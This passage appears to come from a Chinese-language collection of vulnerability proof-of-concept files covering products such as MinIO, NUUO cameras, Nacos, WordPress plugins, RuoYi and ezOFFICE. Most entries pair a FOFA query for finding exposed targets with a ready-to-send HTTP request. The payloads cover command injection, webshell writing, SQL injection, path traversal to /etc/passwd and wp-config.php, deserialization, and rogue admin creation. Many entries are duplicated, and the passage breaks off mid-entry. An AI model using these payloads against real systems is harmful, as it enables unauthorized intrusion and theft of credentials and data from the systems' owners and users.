24 | - https://mp.weixin.qq.com/s/f35n0-9OOME5gSsiwEv0Vg
--------------------------------------------------------------------------------
/wpoc/Minio/Minio-verify信息泄露(CVE-2023-28432).md:
--------------------------------------------------------------------------------
1 | ## Minio-verify信息泄露(CVE-2023-28432)
2 |
3 | MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息。泄露的信息中包含登录账号密码。
4 |
5 | ## fofa
6 |
7 | ```
8 | (banner="MinIO" || header="MinIO" || title="MinIO Browser") && country="CN"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | /minio/bootstrap/v1/verify
15 | ```
16 |
17 | 
--------------------------------------------------------------------------------
/wpoc/NUUO/NUUO摄像机handle_config.php远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | # NUUO摄像机handle_config.php远程代码执行漏洞
2 |
3 | NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,NUUO摄像头handle_config.php存在未授权命令执行漏洞,攻击者可以获取服务器权限
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="www.nuuo.com/eHelpdesk.php"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /handle_config.php?log=;id; HTTP/1.1
15 | Host:
16 | ```
17 |
18 | 
--------------------------------------------------------------------------------
/wpoc/NUUO/NUUO摄像机handle_site_config远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | # NUUO摄像机handle_site_config远程代码执行漏洞
2 |
3 | NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,NUUO摄像头handle_site_config.php存在未授权命令执行漏洞,攻击者可以获取服务器权限
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | body="www.nuuo.com/eHelpdesk.php"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /handle_site_config.php?log=;id; HTTP/1.1
15 | Host:
16 | Priority: u=0, i
17 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
18 | ```
19 |
20 | 
--------------------------------------------------------------------------------
/wpoc/Nacos/Nacos未授权下载配置信息.md:
--------------------------------------------------------------------------------
1 | # Nacos未授权下载配置信息
2 |
3 | Nacos未授权下载配置信息
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | icon_hash="13942501"
9 | ```
10 |
11 | ## poc
12 |
13 | ```java
14 | GET /v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId= HTTP/1.1
15 | Host:
16 | ```
17 |
18 | 
--------------------------------------------------------------------------------
/wpoc/Next/Next.js权限绕过(CVE-2024-51479).md:
--------------------------------------------------------------------------------
1 | # Next.js权限绕过(CVE-2024-51479)
2 |
3 | Next.js 是一个用于构建全栈 Web 应用程序的 React 框架。在受影响的版本中,如果 Next.js 应用程序正在基于路径名的中间件中执行授权,则可能会绕过应用程序根目录下的页面的此授权,允许未经授权访问Next.js应用程序中的根级页面,这些页面本应受到授权检查的保护
4 |
5 | ## fofa
6 | ```javascript
7 | app="NEXT.JS"
8 | ```
9 |
10 | ## poc
11 | ```javascript
12 | /admin?__nextLocale=111
13 | /admin/users?__nextLocale=anything
14 | ```
15 |
16 | 
17 |
18 | ## 漏洞来源
19 |
20 | - https://mp.weixin.qq.com/s/rPBKzvNI9wc79tDr2KC5sA
--------------------------------------------------------------------------------
/wpoc/Openfire/Openfire身份认证绕过漏洞(CVE-2023-32315).md:
--------------------------------------------------------------------------------
1 | ## Openfire身份认证绕过漏洞(CVE-2023-32315)
2 | ```
3 | GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.1
4 |
5 | ```
6 |
--------------------------------------------------------------------------------
/wpoc/Panabit iXCache/Panabit iXCache网关RCE漏洞CVE-2023-38646.md:
--------------------------------------------------------------------------------
1 | ## Panabit iXCache网关RCE漏洞CVE-2023-38646
2 | ```
3 | POST /cgi-bin/Maintain/date_config HTTP/1.1
4 | Host: 127.0.0.1:8443
5 | Cookie: pauser_9667402_260=paonline_admin_44432_9663; pauser_9661348_661=paonline_admin_61912_96631
6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
7 | Content-Type: application/x-www-form-urlencoded
8 | Content-Length: 107
9 |
10 | ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp1
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/Panabit-iXCache/Panabit-iXCache网关RCE漏洞CVE-2023-38646.md:
--------------------------------------------------------------------------------
1 | ## Panabit iXCache网关RCE漏洞CVE-2023-38646
2 | ```
3 | POST /cgi-bin/Maintain/date_config HTTP/1.1
4 | Host: 127.0.0.1:8443
5 | Cookie: pauser_9667402_260=paonline_admin_44432_9663; pauser_9661348_661=paonline_admin_61912_96631
6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
7 | Content-Type: application/x-www-form-urlencoded
8 | Content-Length: 107
9 |
10 | ntpserver=0.0.0.0%3Bwhoami&year=2000&month=08&day=15&hour=11&minute=34&second=53&ifname=fxp1
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/Panel/Panel loadfile 后台文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## Panel loadfile 后台文件读取漏洞
2 | ```
3 | POST /api/v1/file/loadfile
4 | {"paht":"/etc/passwd"}
5 | ```
6 |
--------------------------------------------------------------------------------
/wpoc/Panel/Panel-loadfile-后台文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## Panel loadfile 后台文件读取漏洞
2 | ```
3 | POST /api/v1/file/loadfile
4 | {"paht":"/etc/passwd"}
5 | ```
6 |
--------------------------------------------------------------------------------
/wpoc/Progress/Progress-Flowmon命令注入漏洞(CVE-2024-2389).md:
--------------------------------------------------------------------------------
1 | ## Progress-Flowmon命令注入漏洞(CVE-2024-2389)
2 |
3 |
4 | ## fofa
5 | ```
6 | body="Flowmon-Web-Interface"
7 | ```
8 |
9 |
10 | ## poc
11 | ```
12 | GET /service.pdfs/confluence?lang=en&file=`ping+dnslog地址` HTTP/1.1
13 | Host: x.x.x.x
14 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
15 | Connection: close
16 | Accept: */*
17 | Accept-Language: en
18 | Accept-Encoding: gzip
19 | ```
20 |
--------------------------------------------------------------------------------
/wpoc/Public CMS/JAVA Public CMS 后台RCE漏洞.md:
--------------------------------------------------------------------------------
1 | ## JAVA Public CMS 后台RCE漏洞
2 | ```
3 | 下载地址:https://github.com/sanluan/PublicCMS/
4 | ```
5 |
6 | ## 漏洞复现
7 | 
8 |
9 | 
10 |
11 | 
12 |
13 | 
14 |
15 | ## 环境搭建和复现
16 | ```
17 | https://mp.weixin.qq.com/s/MHNVFo6EK8CZtelMaGOBxA
18 | ```
19 |
--------------------------------------------------------------------------------
/wpoc/Public-CMS/JAVA-Public-CMS-后台RCE漏洞.md:
--------------------------------------------------------------------------------
1 | ## JAVA Public CMS 后台RCE漏洞
2 | ```
3 | 下载地址:https://github.com/sanluan/PublicCMS/
4 | ```
5 |
6 | ## 漏洞复现
7 | 
8 |
9 | 
10 |
11 | 
12 |
13 | 
14 |
15 | ## 环境搭建和复现
16 | ```
17 | https://mp.weixin.qq.com/s/MHNVFo6EK8CZtelMaGOBxA
18 | ```
19 |
--------------------------------------------------------------------------------
/wpoc/QQ/QQ客户端存在远程命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ## QQ客户端RCE漏洞
2 | 漏洞名称:QQ客户端RCE漏洞
3 | 漏洞类型:0day
4 |
5 | 产品官网链接:https://im.qq.com
6 |
7 | 影响范围:QQ Windows版9.7.13及以前版本
8 |
9 | 漏洞所在功能模块:文档传输下载模块
10 |
11 | 漏洞攻击效果:远程代码执行
12 |
13 | ## 漏洞复现
14 | ```
15 | https://mp.weixin.qq.com/s/u4cmq3SQKzaFXVYj3Er8cg
16 | https://mp.weixin.qq.com/s/ZjTPJHxGAz0qYaidbxOYmA
17 | ```
18 |
--------------------------------------------------------------------------------
/wpoc/RAISECOM网关设备/RAISECOM网关设备list_base_config.php存在远程命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | # RAISECOM网关设备list_base_config.php存在远程命令执行漏洞
2 |
3 | ## fofa
4 |
5 | ```yaml
6 | body="/images/raisecom/back.gif"
7 | ```
8 |
9 | ## poc
10 |
11 | ```java
12 | GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Finfo.php%60 HTTP/1.1
13 | Host:
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
15 |
16 | ```
17 |
18 | 文件路径`http://ip/tmp/info.php`
--------------------------------------------------------------------------------
/wpoc/RuoYi/RuoYi4.6.0 SQL注入漏洞CVE-2023-49371.md:
--------------------------------------------------------------------------------
1 | ## RuoYi4.6.0 SQL注入漏洞CVE-2023-49371
2 |
3 | 若依在4.6版本之前存在SQL注入漏洞,攻击者通过该漏洞可以进行SQL注入利用,从而获取数据库中的敏感信息
4 |
5 | ## poc
6 | ```
7 | DeptName=1&deptid =100&ParentId=12&Status= 0&ordernum =1&ancestors=0)or(extractvalue(1,concat((select user())))); #
8 | ```
9 | 
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/wpoc/RuoYi/RuoYi4.6.0-SQL注入漏洞CVE-2023-49371.md:
--------------------------------------------------------------------------------
1 | ## RuoYi4.6.0 SQL注入漏洞CVE-2023-49371
2 |
3 | 若依在4.6版本之前存在SQL注入漏洞,攻击者通过该漏洞可以进行SQL注入利用,从而获取数据库中的敏感信息
4 |
5 | ## poc
6 | ```
7 | DeptName=1&deptid =100&ParentId=12&Status= 0&ordernum =1&ancestors=0)or(extractvalue(1,concat((select user())))); #
8 | ```
9 | 
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/wpoc/Secnet安网智能AC管理系统/Secnet安网 智能AC管理系统 actpt_5g 信息泄露.md:
--------------------------------------------------------------------------------
1 | ## Secnet安网 智能AC管理系统 actpt_5g 信息泄露
2 |
3 | ## fofa
4 | ```
5 | title="安网-智能路由系统" || header="HTTPD_ac 1.0"
6 | ```
7 | ## poc
8 | ```
9 | http://xxxxx/actpt_5g.data
10 | ```
11 |
12 | 
13 |
14 | 
15 |
16 |
--------------------------------------------------------------------------------
/wpoc/Secnet安网智能AC管理系统/Secnet安网-智能AC管理系统-actpt_5g-信息泄露.md:
--------------------------------------------------------------------------------
1 | ## Secnet安网 智能AC管理系统 actpt_5g 信息泄露
2 |
3 | ## fofa
4 | ```
5 | title="安网-智能路由系统" || header="HTTPD_ac 1.0"
6 | ```
7 | ## poc
8 | ```
9 | http://xxxxx/actpt_5g.data
10 | ```
11 |
12 | 
13 |
14 | 
15 |
16 |
--------------------------------------------------------------------------------
/wpoc/Sharp/Sharp多功能打印机未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | # Sharp多功能打印机未授权访问漏洞
2 |
3 |
4 |
5 | ## poc
6 |
7 | ```
8 | /installed_emanual_list.html
9 | ```
10 |
11 | 
--------------------------------------------------------------------------------
/wpoc/SpringEureka/SpringEureka存在actuator未授权漏洞.md:
--------------------------------------------------------------------------------
1 | # SpringEureka存在actuator未授权漏洞
2 |
3 | # 一、漏洞描述
4 | SpringEureka存在actuator未授权漏洞
5 |
6 | # 二、影响版本
7 | 
8 |
9 | # 三、漏洞复现
10 | ```plain
11 | /actuator/env
12 | ```
13 |
14 | 
15 |
16 |
17 |
18 | > 更新: 2024-09-05 23:24:41
19 | > 原文:
--------------------------------------------------------------------------------
/wpoc/Supermap iServer/Supermap iServer任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## Supermap iServer任意文件读取漏洞
2 |
3 | ## 漏洞描述
4 | 北京超图软件股份有限公司是聚焦地理信息软件和空间智能领域的基础软件与应用软件厂商,Supermap iServer 存在文件读取漏洞,攻击者可获取用于认证的tokenKey
5 | ## fofa
6 |
7 | icon_hash="-1656662001"
8 |
9 | ## poc
10 | ```
11 | /iserver/output/../WEB-IN%2546/iserver-system.xml
12 | ```
13 |
--------------------------------------------------------------------------------
/wpoc/Symfony/Symfony-app_dev.php信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ## Symfony-app_dev.php信息泄露漏洞
2 |
3 | Sensio Labs Symfony是法国Sensio Labs公司的一套免费的、基于MVC架构的PHP开发框架。该框架提供常用的功能组件及工具,可用于快速创建复杂的WEB程序。
4 |
5 | ## poc
6 |
7 | ```
8 | /app_dev.php/_profiler/open?file=app/config/parameters.yml
9 | ```
10 |
11 | 
--------------------------------------------------------------------------------
/wpoc/VvvebJs/VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md:
--------------------------------------------------------------------------------
1 | ## VvvebJs < 1.7.5 Arbitrary File Upload - RCE (CVE-2024-29272)
2 |
3 | ## fofa
4 | ```
5 | icon_hash="524332373"
6 | ```
7 | ## poc
8 | ```
9 | POST /save.php HTTP/1.1
10 | Host:
11 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
12 |
13 | file=demo%2Flanding%2Findex.php&html=
14 | ```
15 | ## nuclei Template
16 | https://github.com/projectdiscovery/nuclei-templates/pull/10608/files
17 |
18 | ## ref
19 | https://github.com/givanz/VvvebJs/issues/343
20 | https://github.com/awjkjflkwlekfdjs/CVE-2024-29272/tree/main
--------------------------------------------------------------------------------
/wpoc/WEBMAIL/WEBMAIL存在任意用户登录漏洞.md:
--------------------------------------------------------------------------------
1 | ## WEBMAIL存在任意用户登录漏洞
2 |
3 | ```
4 | RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
5 | 回显errormsg为密码
6 | 用户名为 admin
7 | 添加头 X-Forwarded-For: 127.0.0.1
8 |
9 | 如果有登录失败的话,使用
10 | /RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 登录
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/WVP视频平台/WVP视频平台(国标28181)未授权SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # WVP视频平台(国标28181)未授权SQL注入漏洞
2 |
3 | WVP视频平台(国标28181)未授权接口/api/push/list存在SQL注入漏洞
4 |
5 | ## fofa
6 |
7 | ```yaml
8 | body="国标28181"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1
15 | Host:
16 | Accept-Encoding: gzip, deflate, br
17 | Accept: */*
18 | Connection: close
19 | ```
20 |
21 | 
--------------------------------------------------------------------------------
/wpoc/WeiPHP/WeiPHP存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 |
2 | ## WeiPHP存在SQL注入漏洞
3 |
4 | ## fofa
5 | ```
6 | app="WeiPHP"
7 | ```
8 |
9 | ## poc
10 | ```
11 | POST /public/index.php/weixin/message/_send_by_group HTTP/1.1
12 | Host:
13 | Content-Type: application/x-www-form-urlencoded
14 | Accept-Encoding: gzip
15 | Connection: close
16 |
17 | group_id[0]=exp&group_id[1]=%29+and+updatexml%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%2C1%29+--
18 | ```
19 |
--------------------------------------------------------------------------------
/wpoc/WinRAR/WinRAR CVE-2023-38831.md:
--------------------------------------------------------------------------------
1 |
2 | ## CVE-2023-38831
3 |
4 | ## 漏洞复现
5 | ```
6 | https://mp.weixin.qq.com/s/UXWW7nuu52r7p6x9R3EcNA
7 | ```
8 |
--------------------------------------------------------------------------------
/wpoc/WinRAR/WinRAR-CVE-2023-38831.md:
--------------------------------------------------------------------------------
1 |
2 | ## CVE-2023-38831
3 |
4 | ## 漏洞复现
5 | ```
6 | https://mp.weixin.qq.com/s/UXWW7nuu52r7p6x9R3EcNA
7 | ```
8 |
--------------------------------------------------------------------------------
/wpoc/WordPress/WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954).md:
--------------------------------------------------------------------------------
1 | ## WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954)
2 |
3 | ## fofa
4 | ```
5 | "/wp-content/plugins/wp-automatic"
6 | ```
7 |
8 | ## poc
9 | ```
10 | GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
11 | Host:
12 | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
13 | Connection: close
14 | Accept: */*
15 | Accept-Language: en
16 | Accept-Encoding: gzip
17 | ```
18 |
19 | 
20 |
--------------------------------------------------------------------------------
/wpoc/WordPress/WordPress-Automatic-Plugin任意文件下载漏洞(CVE-2024-27954).md:
--------------------------------------------------------------------------------
1 | ## WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954)
2 |
3 | ## fofa
4 | ```
5 | "/wp-content/plugins/wp-automatic"
6 | ```
7 |
8 | ## poc
9 | ```
10 | GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
11 | Host:
12 | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
13 | Connection: close
14 | Accept: */*
15 | Accept-Language: en
16 | Accept-Encoding: gzip
17 | ```
18 |
19 | 
20 |
--------------------------------------------------------------------------------
/wpoc/WordPress/WordPress-thimpress_hotel_booking存在代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | ## WordPress-thimpress_hotel_booking存在代码执行漏洞
2 |
3 |
4 | ## fofa
5 | ```
6 | body="wp-content/plugins/wp-hotel-booking"
7 | ```
8 |
9 |
10 | ## poc
11 | ```
12 | GET / HTTP/1.1
13 | Host:
14 | User-Agent: Mozilla/5.0
15 | Connection: close
16 | Cookie: thimpress_hotel_booking_1=O:11:"WPHB_Logger":1:{s:21:"%00WPHB_Logger%00_handles"%3BC:33:"Requests_Utility_FilteredIterator":67:{x:i:0%3Ba:1:{i:0%3Bs:2:"-1"%3B}%3Bm:a:1:{s:11:"%00*%00callback"%3Bs:7:"phpinfo"%3B}}}
17 | Accept-Encoding: gzip
18 |
19 | ```
20 |
--------------------------------------------------------------------------------
/wpoc/WordPress/WordPress_Wholesale_Market插件存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## WordPress_Wholesale_Market插件存在任意文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | body="wp-content/plugins/wholesale-market"
6 | ```
7 |
8 | ## poc
9 | ```
10 | /wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin§ion=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php HTTP/1.1
11 | Host:
12 | User-Agent: Mozilla/5.0
13 | Connection: close
14 | Accept-Encoding: gzip
15 | ```
16 |
17 |
--------------------------------------------------------------------------------
/wpoc/WordPress/WordPress插件query-console存在未授权RCE漏洞.md:
--------------------------------------------------------------------------------
1 | # WordPress插件query-console存在未授权RCE漏洞
2 |
3 | WordPress Query Console插件1.0版本存在安全缺陷问题,未经身份验证的远程攻击者可利用此插件执行任意PHP代码,调用系统命令可直接造成RCE,植入webshell将进一步获取服务器权限
4 |
5 | ## poc
6 |
7 | ```javascript
8 | POST /wp-json/wqc/v1/query HTTP/1.1
9 | Host:
10 | Accept: */*
11 | Content-Type: application/json
12 | Accept-Encoding: gzip, deflate
13 | Priority: u=0
14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
15 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
16 |
17 | {"queryArgs":"system('cat /etc/passwd')","queryType":"WP_Query"}
18 | ```
19 |
20 |
--------------------------------------------------------------------------------
/wpoc/WordPress/Wordpress Backup Migration plugin 代码执行漏洞(CVE-2023-6553).md:
--------------------------------------------------------------------------------
1 | ## Wordpress Backup Migration plugin 代码执行漏洞(CVE-2023-6553)
2 | 在wordpress的Backup Migration 插件中存在代码注入漏洞,未授权的攻击者可以利用该漏洞注入恶意PHP代码并执行。
3 |
4 |
5 | ## poc
6 | - https://github.com/Chocapikk/CVE-2023-6553
7 |
--------------------------------------------------------------------------------
/wpoc/WordPress/Wordpress-Backup-Migration-plugin-代码执行漏洞(CVE-2023-6553).md:
--------------------------------------------------------------------------------
1 | ## Wordpress Backup Migration plugin 代码执行漏洞(CVE-2023-6553)
2 | 在wordpress的Backup Migration 插件中存在代码注入漏洞,未授权的攻击者可以利用该漏洞注入恶意PHP代码并执行。
3 |
4 |
5 | ## poc
6 | - https://github.com/Chocapikk/CVE-2023-6553
7 |
--------------------------------------------------------------------------------
/wpoc/ZKBioSecurity/ZKBioSecurity存在shiro反序列漏洞.md:
--------------------------------------------------------------------------------
1 | # ZKBioSecurity存在shiro反序列漏洞
2 |
3 | ZKBioSecurity平台存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | title=="ZKBioSecurity" && body="Automatic login within two weeks"
9 | ```
10 |
11 | ## poc
12 |
13 | 利用工具
14 |
15 | ```
16 | https://github.com/SummerSec/ShiroAttack2/releases/tag/4.7.0
17 | ```
18 |
19 | 
--------------------------------------------------------------------------------
/wpoc/ZoneMinder/ZoneMinder系统sort接口存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # ZoneMinder系统sort接口存在SQL注入漏洞
2 |
3 | ZoneMinder 是一款免费、开源的闭路电视软件应用程序,专为 Linux 开发,支持 IP、USB 和模拟摄像机。
4 |
5 | ## poc
6 |
7 | ```java
8 | http://host:port/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1
9 | ```
10 |
11 | ```java
12 | http://host:port/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request
13 | ```
14 |
15 |
--------------------------------------------------------------------------------
/wpoc/dede/DeDecms接口sys_verifies.php存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # DeDecms接口sys_verifies.php存在任意文件读取漏洞
2 |
3 | 需前台注册用户权限。
4 |
5 | ## poc
6 |
7 | ```java
8 | http://ip/dede/sys_verifies.php?action=view&filename=../../../../../etc/passwd
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/wpoc/iDocView/IDocView_qJvqhFt接口任意文件读取.md:
--------------------------------------------------------------------------------
1 | ## IDocView_qJvqhFt接口任意文件读取
2 |
3 |
4 | ## fofa
5 | ```
6 | title="I Doc View"
7 | ```
8 |
9 | ## poc
10 | ```
11 | GET /view/qJvqhFt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi HTTP/1.1
12 | Host:
13 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
14 | Connection: close
15 | Accept-Encoding: gzip, deflate, br
16 | ```
17 |
18 | 
19 |
--------------------------------------------------------------------------------
/wpoc/iDocView/iDocView upload接口任意文件读取.md:
--------------------------------------------------------------------------------
1 | ## iDocView upload接口任意文件读取
2 | iDocView是一个在线文档预览系统 /doc/upload 接口处存在任意文件读取漏洞,未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息,使系统处于极度不安全的状态。
3 |
4 | ## 资产测绘
5 | ```
6 | Hunter语法:
7 | app.name="I Doc View"
8 | Fofa语法:
9 | title="I Doc View"
10 | ```
11 |
12 | ## poc
13 | ```
14 | http://xxxxxx/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name=test.txt
15 | ```
16 | 
17 |
18 | 
19 |
--------------------------------------------------------------------------------
/wpoc/iDocView/iDocView-upload接口任意文件读取.md:
--------------------------------------------------------------------------------
1 | ## iDocView upload接口任意文件读取
2 | iDocView是一个在线文档预览系统 /doc/upload 接口处存在任意文件读取漏洞,未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息,使系统处于极度不安全的状态。
3 |
4 | ## 资产测绘
5 | ```
6 | Hunter语法:
7 | app.name="I Doc View"
8 | Fofa语法:
9 | title="I Doc View"
10 | ```
11 |
12 | ## poc
13 | ```
14 | http://xxxxxx/doc/upload?token=testtoken&url=file:///C:/windows/win.ini&name=test.txt
15 | ```
16 | 
17 |
18 | 
19 |
--------------------------------------------------------------------------------
/wpoc/jshERP/jshERP信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ## 华夏ERP管理员信息泄露漏洞
2 |
3 | ## fofa
4 | ```
5 | icon_hash="-1298131932"
6 | ```
7 | ## POC
8 | ```
9 | GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
10 | Host:
11 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
12 | Connection: close
13 | Accept: */*
14 | Accept-Language: en
15 | Accept-Encoding: gzip
16 | ```
17 |
18 | 
19 |
--------------------------------------------------------------------------------
/wpoc/omfyUI/omfyUI follow_symlinks文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## omfyUI follow_symlinks文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="ComfyUI"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://ip:8188/../../../../../../../../../../../../../../etc/passwd
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/omfyUI/omfyUI-follow_symlinks文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ## omfyUI follow_symlinks文件读取漏洞
2 |
3 | ## fofa
4 | ```
5 | app="ComfyUI"
6 | ```
7 |
8 | ## poc
9 | ```
10 | http://ip:8188/../../../../../../../../../../../../../../etc/passwd
11 | ```
12 |
--------------------------------------------------------------------------------
/wpoc/pgAdmin/CVE-2024-9014.md:
--------------------------------------------------------------------------------
1 | # pgAdmin4敏感信息泄露漏洞(CVE-2024-9014)
2 |
3 | CVE-2024-9014 pgAdmin4 敏感信息泄露 ,pgAdmin 版本 8.11 及更早版本容易受到 OAuth2 身份验证中的安全缺陷的影响。此漏洞允许攻击者获取客户端 ID 和机密,从而导致对用户数据的未经授权的访问。
4 |
5 | ## fofa
6 |
7 | ```javascript
8 | icon_hash="1502815117"
9 | ```
10 |
11 | ## poc
12 |
13 | ```javascript
14 | GET /login?next=/ HTTP/1.1
15 | Host: 192.168.31.135:5050
16 |
17 | ```
18 |
19 | 
20 |
21 |
22 |
23 | ## 漏洞来源
24 |
25 | - https://github.com/EQSTLab/CVE-2024-9014
--------------------------------------------------------------------------------
/wpoc/zzcms/zzcms系统接口index.php存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | # zzcms系统接口index.php存在SQL注入漏洞
2 |
3 | ZZCMS 2023中发现了一个严重漏洞。该漏洞影响了文件/index.php中的某些未知功能,操纵参数id会导致SQL注入,攻击可能是远程发起的,该漏洞已被公开披露并可被利用。
4 |
5 | ## poc
6 |
7 | ```javascript
8 | http://127.0.0.1:8888/zhanting/index.php?id=1'union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,sleep(5)+--+x&skin=
9 |
10 | ```
11 |
12 | 
13 |
14 | ## 漏洞来源
15 |
16 | - https://github.com/En0t5/vul/blob/main/zzcms/zzcsm-sql-inject.md
--------------------------------------------------------------------------------
/wpoc/万户OA/万户 ezOFFICE DocumentHistory.jsp SQL注入.md:
--------------------------------------------------------------------------------
1 | ## 万户 ezOFFICE DocumentHistory.jsp SQL注入
2 |
3 | DocumentHistory.jsp接口处存在sql注入漏洞,攻击者可获取数据库中敏感信息
4 |
5 | ## fofa
6 | ```
7 | app="ezOFFICE协同管理平台"
8 | ```
9 |
10 | ## poc
11 | ```
12 | GET /defaultroot/public/iSignatureHTML.jsp/DocumentHistory.jsp;.js?DocumentID=1%27%20WAITFOR%20DELAY%20%270:0:8%27-- HTTP/1.1
13 | ```
14 |
15 |
--------------------------------------------------------------------------------
/wpoc/万户OA/万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞.md:
--------------------------------------------------------------------------------
1 | ## 万户-ezOFFICE-download_ftp.jsp任意文件下载漏洞
2 |
3 | 万户OA-ezOFFICE download_ftp.jsp 接口存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
4 |
5 | ## fofa
6 |
7 | ```
8 | app="万户网络-ezOFFICE"
9 | ```
10 |
11 | ## poc
12 |
13 | ```
14 | /defaultroot/download_ftp.jsp?path=/../WEB-INF/&name=aaa&FileName=web.xml
15 | ```
16 |
17 | 
--------------------------------------------------------------------------------
/wpoc/万户OA/万户ezOFFICE-contract_gd.jsp存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ## 万户ezOFFICE-contract_gd.jsp存在SQL注入漏洞
2 |
3 |
4 | ## poc
5 | ```
